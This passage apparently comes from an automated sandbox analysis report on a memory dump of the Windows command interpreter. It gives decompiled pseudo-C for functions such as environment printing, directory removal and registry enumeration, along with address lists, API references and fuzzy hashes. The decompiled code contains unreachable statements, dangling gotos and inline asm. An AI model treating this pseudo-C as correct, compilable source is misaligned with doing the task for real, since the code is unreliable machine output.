				__eflags = _t67 - 0x103;
				if(_t67 == 0x103) {
					_t67 = _t66;
				}
				goto L27;
			}





























                                                    0x011f4b4e
                                                    0x011f4b59
                                                    0x011f4b60
                                                    0x011f4b65
                                                    0x011f4b67
                                                    0x011f4b70
                                                    0x011f4c63
                                                    0x011f4c65
                                                    0x011f4c67
                                                    0x011f4c3a
                                                    0x011f4c3c
                                                    0x011f4cdf
                                                    0x011f4ce4
                                                    0x011f4cef
                                                    0x011f4cef
                                                    0x011f4c6b
                                                    0x011f4c6e
                                                    0x011f4c73
                                                    0x011f4c75
                                                    0x011f4c77
                                                    0x011f4c79
                                                    0x011f4c79
                                                    0x011f4c7e
                                                    0x011f4c85
                                                    0x011f4c87
                                                    0x011f4c8d
                                                    0x011f4c8f
                                                    0x011f4cb9
                                                    0x011f4cbc
                                                    0x011f4cbc
                                                    0x011f4cc3
                                                    0x00000000
                                                    0x011f4c91
                                                    0x011f4c91
                                                    0x011f4c93
                                                    0x011f4c93
                                                    0x011f4c95
                                                    0x011f4c95
                                                    0x011f4c98
                                                    0x011f4c98
                                                    0x011f4c9b
                                                    0x011f4c9e
                                                    0x011f4c9e
                                                    0x011f4ca3
                                                    0x011f4ca3
                                                    0x011f4ca5
                                                    0x011f4ca7
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4ca9
                                                    0x011f4caa
                                                    0x011f4cb5
                                                    0x011f4cc8
                                                    0x011f4cd1
                                                    0x011f4cd8
                                                    0x011f4cdd
                                                    0x011f4cdd
                                                    0x00000000
                                                    0x011f4cdd
                                                    0x011f4c8f
                                                    0x011f4b76
                                                    0x011f4b78
                                                    0x011f4b7a
                                                    0x011f4b80
                                                    0x011f4b8a
                                                    0x011f4ba4
                                                    0x011f4ba8
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4bae
                                                    0x011f4bb6
                                                    0x011f4c09
                                                    0x011f4c09
                                                    0x011f4c0f
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4c11
                                                    0x011f4c12
                                                    0x011f4c1a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4c20
                                                    0x00000000
                                                    0x011f4c20
                                                    0x011f4bb8
                                                    0x011f4bbe
                                                    0x011f4bc9
                                                    0x011f4bcd
                                                    0x011f4c2b
                                                    0x011f4c32
                                                    0x011f4c33
                                                    0x00000000
                                                    0x011f4c39
                                                    0x011f4bcf
                                                    0x011f4bd1
                                                    0x011f4bd1
                                                    0x011f4bd4
                                                    0x011f4bd4
                                                    0x011f4bd7
                                                    0x011f4bda
                                                    0x011f4be3
                                                    0x011f4be5
                                                    0x011f4bec
                                                    0x011f4bf2
                                                    0x011f4bf7
                                                    0x011f4bfa
                                                    0x011f4bfa
                                                    0x011f4bfe
                                                    0x011f4c03
                                                    0x00000000
                                                    0x011f4c03
                                                    0x011f4c42
                                                    0x011f4c48
                                                    0x011f4c4e
                                                    0x011f4c4e
                                                    0x00000000

                                                    APIs
                                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4B9E
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4C2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: EnumErrorLast
                                                    • String ID: %s=%s$.
                                                    • API String ID: 1967352920-4275322459
                                                    • Opcode ID: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                                    • Instruction ID: 666e5663c9a4e08802e6672649645547f98ad4a168bfce08b4b2956925f350b7
                                                    • Opcode Fuzzy Hash: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                                    • Instruction Fuzzy Hash: B6416871F0021A87CB3CABAD9CA8BBB76F9EB94314F0501ADDA1A97240DF704E418791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FAB79, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E011FAB79(void* __ecx, char* __edx, signed char* _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				char* _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				void* _t39;
				char _t42;
				void* _t44;
				intOrPtr _t47;
				void* _t59;
				signed int _t61;

				_t58 = __edx;
				_t25 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t25 ^ _t61;
				_v28 = _v28 & 0x00000000;
				_t60 = 0x104;
				_v552 = __edx;
				_v20 = 0x104;
				_t46 = 1;
				_t59 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t37 = _a4;
					_t60 = L"%s";
					if(( *_a4 & 0x00000010) != 0) {
						_t60 = L"[%s]";
					}
					_t39 = E011E0D89(_t58, _t37 + 0x2c);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t47 = _v552;
					E011E6810(_t39, _t54, _t47);
					if(_t47 < 0) {
						_t44 = _v28;
						if(_t44 == 0) {
							_t44 =  &_v548;
						}
						__imp___wcslwr(_t44);
					}
					_t41 = _v28;
					if(_v28 == 0) {
						_t41 =  &_v548;
					}
					_t58 = _t60;
					_t42 = E011E6B76(_t59, _t60, _t41);
					_t46 = _t42;
					if(_t42 == 0) {
						_t46 = E011F7D7D(_t59);
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t46, _t46, _v8 ^ _t61, _t58, _t59, _t60, _v28);
			}




















                                                    0x011fab79
                                                    0x011fab84
                                                    0x011fab8b
                                                    0x011fab8e
                                                    0x011fab9b
                                                    0x011faba0
                                                    0x011faba9
                                                    0x011fabae
                                                    0x011fabaf
                                                    0x011fabb2
                                                    0x011fabb5
                                                    0x011fabdb
                                                    0x011fabdd
                                                    0x011fabe0
                                                    0x011fabe8
                                                    0x011fabea
                                                    0x011fabea
                                                    0x011fabf9
                                                    0x011fabfe
                                                    0x011fac03
                                                    0x011fac05
                                                    0x011fac05
                                                    0x011fac0b
                                                    0x011fac12
                                                    0x011fac19
                                                    0x011fac1b
                                                    0x011fac20
                                                    0x011fac22
                                                    0x011fac22
                                                    0x011fac29
                                                    0x011fac2f
                                                    0x011fac30
                                                    0x011fac35
                                                    0x011fac37
                                                    0x011fac37
                                                    0x011fac3e
                                                    0x011fac42
                                                    0x011fac47
                                                    0x011fac4b
                                                    0x011fac54
                                                    0x011fac54
                                                    0x011fac4b
                                                    0x011fac59
                                                    0x011fac72

                                                    APIs
                                                    • memset.MSVCRT ref: 011FABB5
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • _wcslwr.MSVCRT ref: 011FAC29
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAC59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$_wcslwr
                                                    • String ID: [%s]
                                                    • API String ID: 886762496-302437576
                                                    • Opcode ID: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                                    • Instruction ID: c09e236cb5b70b2300a053064a6c06793fd04e8c558ed09549297d71da787e97
                                                    • Opcode Fuzzy Hash: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                                    • Instruction Fuzzy Hash: 32217571B002195BDB19DAE4E989BBEBBE8AF58314F4804ADE609D3141EB74DE44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E62FA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsnicmp
                                                    • String ID: /-Y$COPYCMD
                                                    • API String ID: 1886669725-617350906
                                                    • Opcode ID: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                                    • Instruction ID: 0c03cfd9843b9412f30f3c6e4ef8bd79977d8261c01111121fc3b547cca2b04f
                                                    • Opcode Fuzzy Hash: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                                    • Instruction Fuzzy Hash: 9F219B72A08A1297DB2C9B9E984D6BAFAF6EFA5250F950069FC4D97241EF308D41C250
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E23A9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                                    • iswspace.MSVCRT ref: 011E23C8
                                                    • _wcsnicmp.MSVCRT ref: 011E2419
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: iswspace$_wcsnicmp
                                                    • String ID: off
                                                    • API String ID: 3989682491-733764931
                                                    • Opcode ID: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                                    • Instruction ID: e69aba4d19a21cf1db1f221edfc95bb234fc90446da2207306f5561b6a4fc8fa
                                                    • Opcode Fuzzy Hash: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                                    • Instruction Fuzzy Hash: F2114C22704E1256FF3E12EE7C7EF3A55EC9F95959B19002AFD46E60C1EF7089808162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F4506, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 73%
                                                    			E011F4506(intOrPtr* __ecx) {
				void* _t5;
				signed int _t6;
				signed int _t8;
				signed int _t9;
				void* _t19;
				signed int _t23;
				intOrPtr* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;

				_t23 = __ecx;
				if(__ecx != 0) {
					_t26 = __ecx;
					__eflags = 0;
					_t19 = __ecx + 2;
					do {
						_t6 =  *_t26;
						_t26 = _t26 + 2;
						__eflags = _t6;
					} while (_t6 != 0);
					while(1) {
						_t27 = _t26 - _t19;
						__eflags = _t27;
						_t28 = _t27 >> 1;
						if(_t27 == 0) {
							break;
						}
						__eflags =  *0x11fd544; // 0x0
						if(__eflags != 0) {
							_t8 = 1;
						} else {
							__eflags =  *_t23 - 0x3d;
							if( *_t23 != 0x3d) {
								_push(_t23);
								E011E25D9(L"%s\r\n");
							}
							_t23 = _t23 + _t28 * 2 + 2;
							__eflags = _t23;
							_t30 = _t23;
							_t19 = _t30 + 2;
							do {
								_t9 =  *_t30;
								_t30 = _t30 + 2;
								__eflags = _t9;
							} while (_t9 != 0);
							continue;
						}
						L12:
						return _t8;
						goto L14;
					}
					_t8 = 0;
					__eflags = 0;
					goto L12;
				} else {
					_push("Null environment");
					fprintf(E011E7721(_t5, 2), "\nCMD Internal Error %s\n");
					return 1;
				}
				L14:
			}













                                                    0x011f4509
                                                    0x011f450d
                                                    0x011f4532
                                                    0x011f4534
                                                    0x011f4536
                                                    0x011f4539
                                                    0x011f4539
                                                    0x011f453c
                                                    0x011f453f
                                                    0x011f453f
                                                    0x011f4577
                                                    0x011f4577
                                                    0x011f4577
                                                    0x011f4579
                                                    0x011f457b
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4546
                                                    0x011f454c
                                                    0x011f4585
                                                    0x011f454e
                                                    0x011f454e
                                                    0x011f4552
                                                    0x011f4554
                                                    0x011f455a
                                                    0x011f4560
                                                    0x011f4564
                                                    0x011f4564
                                                    0x011f4567
                                                    0x011f4569
                                                    0x011f456c
                                                    0x011f456c
                                                    0x011f456f
                                                    0x011f4572
                                                    0x011f4572
                                                    0x00000000
                                                    0x011f456c
                                                    0x011f457f
                                                    0x011f4582
                                                    0x00000000
                                                    0x011f4582
                                                    0x011f457d
                                                    0x011f457d
                                                    0x00000000
                                                    0x011f450f
                                                    0x011f450f
                                                    0x011f4522
                                                    0x011f452f
                                                    0x011f452f
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                                    • fprintf.MSVCRT ref: 011F4522
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: __iob_funcfprintf
                                                    • String ID: CMD Internal Error %s$%s$Null environment
                                                    • API String ID: 620453056-2781220306
                                                    • Opcode ID: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                                    • Instruction ID: 2455adb61447690e94106b46cdd9ec1ad82f53c622971da49736dc96b39d309f
                                                    • Opcode Fuzzy Hash: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                                    • Instruction Fuzzy Hash: 40019E77A442118EDB3CBB9C785D5B37354EAD0214315053FEE6693D54FB705942C141
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F2950, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 24%
                                                    			E011F2950(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				void* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t3 ^ _t20;
				_t18 =  *0x12180a0;
				if(_t18 != 0) {
					L5:
					 *0x12194b4();
					_t6 =  *_t18();
				} else {
					_t8 =  *0x11fd530; // 0x0
					if(_t8 == 0) {
						_t8 = GetModuleHandleW(L"ntdll.dll");
						 *0x11fd530 = _t8;
					}
					_t18 = GetProcAddress(_t8, "RtlDllShutdownInProgress");
					 *0x12180a0 = _t18;
					if(_t18 != 0) {
						goto L5;
					} else {
						_t6 = 0;
					}
				}
				_pop(_t19);
				return E011E6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}














                                                    0x011f2955
                                                    0x011f2956
                                                    0x011f295d
                                                    0x011f2961
                                                    0x011f2969
                                                    0x011f29a0
                                                    0x011f29a2
                                                    0x011f29a8
                                                    0x011f296b
                                                    0x011f296b
                                                    0x011f2972
                                                    0x011f2979
                                                    0x011f297f
                                                    0x011f297f
                                                    0x011f2990
                                                    0x011f2992
                                                    0x011f299a
                                                    0x00000000
                                                    0x011f299c
                                                    0x011f299c
                                                    0x011f299c
                                                    0x011f299a
                                                    0x011f29af
                                                    0x011f29b8

                                                    APIs
                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 011F2979
                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 011F298A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                    • API String ID: 1646373207-582119455
                                                    • Opcode ID: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                                    • Instruction ID: 214ba48a93f13fbb78718f528236add32a921ae3f11247491a49c13772eb1db1
                                                    • Opcode Fuzzy Hash: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                                    • Instruction Fuzzy Hash: 1FF09031A20328DB8F39DF69B91D67A37E8FB54A98781025DEC01D7208EF719D418BD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D88D8, Relevance: 6.2, APIs: 4, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E011D88D8(void* __ecx) {
				signed int _v8;
				void* _v12;
				int _v20;
				signed int _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void _v548;
				void* _v552;
				void* _v556;
				void* _v560;
				int _v564;
				int _v568;
				int _v572;
				char _v576;
				char _v580;
				int _v584;
				int _v588;
				void* _v592;
				void* _v596;
				void* _v602;
				int _v606;
				int _v610;
				int _v614;
				int _v618;
				int _v622;
				int _v626;
				int _v630;
				int _v634;
				short _v636;
				int _v640;
				int _v644;
				int _v648;
				int _v652;
				signed int _v656;
				char _v660;
				signed int _v664;
				char _v668;
				void* _v676;
				void* _v680;
				void* _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t64;
				intOrPtr _t79;
				signed int _t82;
				long _t87;
				long _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr* _t106;
				signed int _t107;
				void* _t116;
				intOrPtr _t118;
				WCHAR** _t119;
				void* _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;

				_t127 = (_t125 & 0xfffffff8) - 0x29c;
				_t64 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t64 ^ _t127;
				_v24 = 1;
				_v644 = 0;
				_t93 = __ecx;
				_v636 = 0;
				_v660 = 0;
				_v656 = 0;
				_v652 = 0;
				_v648 = 0;
				_v640 = 0;
				_v634 = 0;
				_v630 = 0;
				_v626 = 0;
				_v622 = 0;
				_v618 = 0;
				_v614 = 0;
				_v610 = 0;
				_v606 = 0;
				asm("stosd");
				_v668 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v588 = 0;
				_v584 = 0;
				_v580 = 0;
				_v576 = 0;
				_v572 = 0;
				_v568 = 0;
				_v564 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t128 = _t127 + 0xc;
				if(E011E0C70( &_v548, 0x7fe9) < 0) {
					L18:
					_t122 = 1;
				} else {
					_t112 =  &_v660;
					_v664 =  *0x1213cd8;
					_v656 = 6;
					_t122 = 0;
					_v652 = 0;
					_v588 = 0;
					_v568 = 0;
					if(E011D8AD7( &_v660) == 1) {
						goto L18;
					} else {
						_t103 = _v24;
						if(_v24 == 0) {
							_t103 = _t128 + 0x88;
						}
						_t112 =  *((intOrPtr*)(_t128 + 0x298));
						E011E36CB(_t93, _t103,  *((intOrPtr*)(_t128 + 0x298)), 0);
						_t95 = _v588;
						if(_t95 == 0) {
							_push(0);
							goto L30;
						} else {
							_t112 =  &_v580;
							_t118 = _t95;
							do {
								_t106 =  *_t112;
								_v668 = _t106 + 2;
								do {
									_t79 =  *_t106;
									_t106 = _t106 + 2;
								} while (_t79 != _v664);
								_t107 = _t106 - _v668;
								_t103 = _t107 >> 1;
								if(_t107 == 0) {
									_push(0);
									L30:
									_push(0x232a);
									E011DC5A2(_t103);
									goto L18;
								} else {
									goto L8;
								}
								goto L16;
								L8:
								_t112 =  *((intOrPtr*)(_t112 + 0xc));
								_t118 = _t118 - 1;
							} while (_t118 != 0);
							_t119 =  &_v580;
							_t82 = _v656 & 0x00000010;
							_v664 = _t82;
							do {
								if(_t82 == 0) {
									if(RemoveDirectoryW( *_t119) != 0) {
										goto L13;
									} else {
										_t87 = GetLastError();
										_t122 = _t87;
										_push(0);
										_push(_t87);
										goto L28;
									}
									goto L16;
								} else {
									if((_v656 & 0x00002000) == 0) {
										_t112 = 0x234e;
										if(E011F9583( *_t119, 0x234e, 0x2328) == 1) {
											goto L12;
										} else {
											_t122 = 1;
											goto L13;
										}
										goto L16;
									} else {
										L12:
										_t109 =  *_t119;
										_t112 =  &_v668;
										_t91 = E011D85EA( *_t119,  &_v668);
										if(_t91 != 0) {
											if(_t91 != 0x91 || _v668 != 0) {
												_t109 = 0;
												_t122 = _t91;
												_push(0);
												_push(_t91);
												L28:
												E011DC5A2(_t109);
												_pop(_t109);
											}
										}
									}
								}
								L13:
								_t119 = _t119[3];
								_t82 = _v664;
								_t95 = _t95 - 1;
							} while (_t95 != 0);
							_t84 = _v24;
							if(_v24 == 0) {
								_t84 = _t128 + 0x88;
							}
							E011E0BFC(_t84,  *((intOrPtr*)(_t128 + 0x298)));
							E011E2A06(_v668, _t119);
						}
					}
				}
				L16:
				__imp__??_V@YAXPAX@Z(_v28);
				_pop(_t116);
				_pop(_t123);
				_pop(_t94);
				return E011E6FD0(_t122, _t94, _v8 ^ _t128, _t112, _t116, _t123);
			}
































































                                                    0x011d88e0
                                                    0x011d88e6
                                                    0x011d88ed
                                                    0x011d88f6
                                                    0x011d88ff
                                                    0x011d8903
                                                    0x011d8907
                                                    0x011d890e
                                                    0x011d8916
                                                    0x011d891a
                                                    0x011d891e
                                                    0x011d8922
                                                    0x011d8926
                                                    0x011d892a
                                                    0x011d892e
                                                    0x011d8932
                                                    0x011d8936
                                                    0x011d893a
                                                    0x011d893e
                                                    0x011d8942
                                                    0x011d8946
                                                    0x011d8947
                                                    0x011d894b
                                                    0x011d8952
                                                    0x011d8953
                                                    0x011d8954
                                                    0x011d8958
                                                    0x011d8960
                                                    0x011d8964
                                                    0x011d8968
                                                    0x011d896c
                                                    0x011d8970
                                                    0x011d8974
                                                    0x011d8978
                                                    0x011d8979
                                                    0x011d897a
                                                    0x011d8981
                                                    0x011d8991
                                                    0x011d8996
                                                    0x011d89ac
                                                    0x011d8ad2
                                                    0x011d8ad4
                                                    0x011d89b2
                                                    0x011d89b7
                                                    0x011d89bd
                                                    0x011d89c3
                                                    0x011d89cb
                                                    0x011d89cd
                                                    0x011d89d1
                                                    0x011d89d5
                                                    0x011d89e1
                                                    0x00000000
                                                    0x011d89e7
                                                    0x011d89e7
                                                    0x011d89f0
                                                    0x011f06ab
                                                    0x011f06ab
                                                    0x011d89f6
                                                    0x011d89fe
                                                    0x011d8a03
                                                    0x011d8a09
                                                    0x011f06b7
                                                    0x00000000
                                                    0x011d8a0f
                                                    0x011d8a0f
                                                    0x011d8a13
                                                    0x011d8a15
                                                    0x011d8a15
                                                    0x011d8a1a
                                                    0x011d8a1e
                                                    0x011d8a1e
                                                    0x011d8a21
                                                    0x011d8a24
                                                    0x011d8a2b
                                                    0x011d8a2f
                                                    0x011d8a31
                                                    0x011f0720
                                                    0x011f0721
                                                    0x011f0721
                                                    0x011f0726
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d8a37
                                                    0x011d8a37
                                                    0x011d8a3a
                                                    0x011d8a3a
                                                    0x011d8a43
                                                    0x011d8a47
                                                    0x011d8a4a
                                                    0x011d8a4e
                                                    0x011d8a50
                                                    0x011f0700
                                                    0x00000000
                                                    0x011f0706
                                                    0x011f0706
                                                    0x011f070c
                                                    0x011f0710
                                                    0x011f0711
                                                    0x00000000
                                                    0x011f0711
                                                    0x00000000
                                                    0x011d8a56
                                                    0x011d8a5e
                                                    0x011f06bc
                                                    0x011f06ce
                                                    0x00000000
                                                    0x011f06d4
                                                    0x011f06d6
                                                    0x00000000
                                                    0x011f06d6
                                                    0x00000000
                                                    0x011d8a64
                                                    0x011d8a64
                                                    0x011d8a64
                                                    0x011d8a66
                                                    0x011d8a6a
                                                    0x011d8a71
                                                    0x011f06e1
                                                    0x011f06ee
                                                    0x011f06f0
                                                    0x011f06f2
                                                    0x011f06f3
                                                    0x011f0712
                                                    0x011f0712
                                                    0x011f0718
                                                    0x011f0718
                                                    0x011f06e1
                                                    0x011d8a71
                                                    0x011d8a5e
                                                    0x011d8a77
                                                    0x011d8a77
                                                    0x011d8a7a
                                                    0x011d8a7e
                                                    0x011d8a7e
                                                    0x011d8a83
                                                    0x011d8a8c
                                                    0x011d8ac9
                                                    0x011d8ac9
                                                    0x011d8a96
                                                    0x011d8a9f
                                                    0x011d8a9f
                                                    0x011d8a09
                                                    0x011d89e1
                                                    0x011d8aa4
                                                    0x011d8aab
                                                    0x011d8abb
                                                    0x011d8abc
                                                    0x011d8abd
                                                    0x011d8ac8

                                                    APIs
                                                    • memset.MSVCRT ref: 011D8991
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D8AAB
                                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 168429351-0
                                                    • Opcode ID: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                                    • Instruction ID: 659a171f208aa7f7ccb7f6b7326bde9e71d26b5a2e188439e0af765a3fd8b6fc
                                                    • Opcode Fuzzy Hash: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                                    • Instruction Fuzzy Hash: 4E6156B1A083029FD72CDF69D48466BBBE5BBD8314F14492EF699C3250EB709904CB87
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D5F75, Relevance: 6.2, APIs: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E011D5F75(void* __ecx) {
				short* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t22;
				intOrPtr _t24;
				short* _t28;
				void* _t29;
				long _t32;
				signed int _t34;
				void* _t35;
				signed int _t38;
				signed int _t39;
				wchar_t* _t40;
				long _t41;
				wchar_t* _t42;
				signed int _t44;
				signed int _t45;
				void* _t46;
				void* _t47;
				wchar_t* _t51;
				wchar_t* _t60;
				signed int _t61;
				signed int _t70;
				void* _t71;
				wchar_t* _t73;
				void* _t75;
				long* _t78;
				long* _t80;
				long _t81;
				void* _t82;
				signed short* _t84;
				wchar_t* _t85;

				_t84 =  *(__ecx + 0x3c);
				if( *0x1213cc9 == 0) {
					_t85 = E011DEA40(_t84, "=", 3);
					_t83 = 0;
					if( *_t85 == 0) {
						L26:
						return E011F4506( *0x1203834);
					}
					_t73 = _t85;
					_v8 = 0;
					_t46 = 2;
					do {
						_t51 = _t73;
						_t6 =  &(_t51[0]); // 0x2
						_v12 = _t6;
						do {
							_t22 =  *_t51;
							_t51 = _t51 + _t46;
						} while (_t22 != _t83);
						_t53 = _t51 - _v12 >> 1;
						_t73 = _t73 + (_t51 - _v12 >> 1) * 2 + 2;
						_t24 = _v8 + 1;
						_v8 = _t24;
					} while ( *_t73 != _t83);
					if(_t24 > 3) {
						L40:
						_push(_t83);
						_push(0x232a);
						E011DC5A2(_t53);
						return 1;
					}
					_t53 = _t85;
					_t28 = E011DD7E6(_t53);
					_v8 = _t28;
					if( *_t28 != 0x3d) {
						goto L40;
					}
					_t75 = _t53 + 2;
					do {
						_t29 =  *_t53;
						_t53 = _t53 + _t46;
					} while (_t29 != _t83);
					_v12 = _t53 - _t75 >> 1;
					E011E1040(_t85, _v12 + 1, E011E22C0(_t46, _t85));
					_t60 = _t85;
					_t17 =  &(_t60[0]); // 0x2
					_t78 = _t17;
					do {
						_t32 =  *_t60;
						_t60 = _t60 + _t46;
					} while (_t32 != _t83);
					_t61 = _t60 - _t78;
					_t53 = _t61 >> 1;
					if(_t61 == 0) {
						goto L40;
					}
					_t80 = _v8 + 4;
					L14:
					return E011E3A50(_t85, _t80);
				}
				if(_t84 == 0) {
					goto L26;
				}
				_t34 =  *_t84 & 0x0000ffff;
				if(_t34 == 0) {
					goto L26;
				}
				_t53 = _t34;
				_t35 = 0x20;
				_t47 = 2;
